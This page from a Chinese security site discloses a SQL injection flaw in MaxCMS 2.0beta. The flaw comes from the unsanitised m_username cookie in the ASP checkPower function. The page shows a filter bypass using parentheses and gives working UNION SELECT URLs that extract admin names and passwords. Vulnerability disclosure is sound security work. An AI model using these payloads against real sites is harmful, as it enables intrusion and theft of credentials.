首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

马克斯CMS2.0beta (maxcms)SQL注入漏洞续


http://www.gipsky.com/
马克斯CMS2.0beta (maxcms)SQL注入漏洞续





另外一处注射





Sub checkPower

dim loginValidate,rsObj : loginValidate = "maxcms2.0"

err.clear

on error resume next

set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&rCookie("m_username")&"'","execute")

loginValidate = md5(getAgent&getIp&rsObj(0))

if err then wCookie "check"&rCookie("m_username"),"" : die ""

if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die ""

checkManagerLevel rsObj(1)

set rsObj=nothing

End Sub其中



Function rCookie(cookieName)

rCookie = request.cookies(cookieName)

End Function通过伪造cookie中m_username的值可以进行注射



不过要知道后台管理目录,默认是/admin/,多个页面可以触发改函数

比如 /admin/admin_ajax.asp

因为sql检测过滤的时候是关键字判断 可是很多重要的关键字后面又加上了个个空格

这样就可以通过寂寞的刺猬发现的用()替代空格的方法绕过

http://localhost/play.asp?id=-999 union(select(password),2,3,4,5,6,7,8,9,0,1 from [zt_admin])

http://localhost/play.asp?id=-999 union(select(adminname),2,3,4,5,6,7,8,9,0,1 from [zt_admin])
<< SEO专家祝鹏:浅谈SEO操作思路及技巧 SSL认证加密被攻破 安全防范需加强 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号